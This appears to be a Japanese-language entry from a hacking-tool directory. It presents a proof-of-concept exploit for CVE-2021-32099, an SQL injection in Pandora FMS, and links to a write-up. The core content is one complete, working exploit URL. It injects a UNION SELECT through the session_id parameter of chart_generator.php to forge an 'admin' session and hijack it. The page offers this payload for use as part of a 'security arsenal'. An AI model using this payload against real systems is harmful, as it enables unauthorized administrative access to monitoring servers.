ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!
CVE-2021-32099の概念実証エクスプロイト。Pandora FMSにおけるSQLインジェクションの脆弱性であり、細工したUNIONクエリによるセッションハイジャックを実証する。
コミュニティで最も使われているツールを見つけましょう。
すべてのツールを探索
ツールコレクションを閲覧
CVE-2021-32099
POC : http://localhost:8000/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271
詳細 : https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained